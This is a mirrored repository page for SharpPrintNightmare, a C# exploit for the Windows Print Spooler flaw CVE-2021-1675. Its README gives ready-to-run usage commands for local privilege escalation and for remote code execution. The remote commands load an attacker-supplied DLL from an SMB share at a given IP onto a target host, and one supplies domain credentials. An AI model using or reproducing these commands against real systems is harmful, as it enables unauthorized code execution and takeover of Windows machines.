r3pek/CVE-2021-1675
1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-11-14 10:07:54 +00:00
Code Releases Activity
CVE-2021-1675/SharpPrintNightmare
History
cube0x0 c6bb4923d8
Update readme
2021-07-02 02:17:44 +02:00
..
.vs/SharpPrintNightmare/v16 c# LPE version 2021-07-01 13:45:37 +02:00
SharpPrintNightmare c# remote version 2021-07-01 23:30:25 +02:00
README.md Update readme 2021-07-02 02:17:44 +02:00

README.md

C# Implementation of CVE-2021-1675

Usage

#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll

#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'

#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll'  'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123

Acknowledgements

For contributing new ideas or exploit improvements, thanks to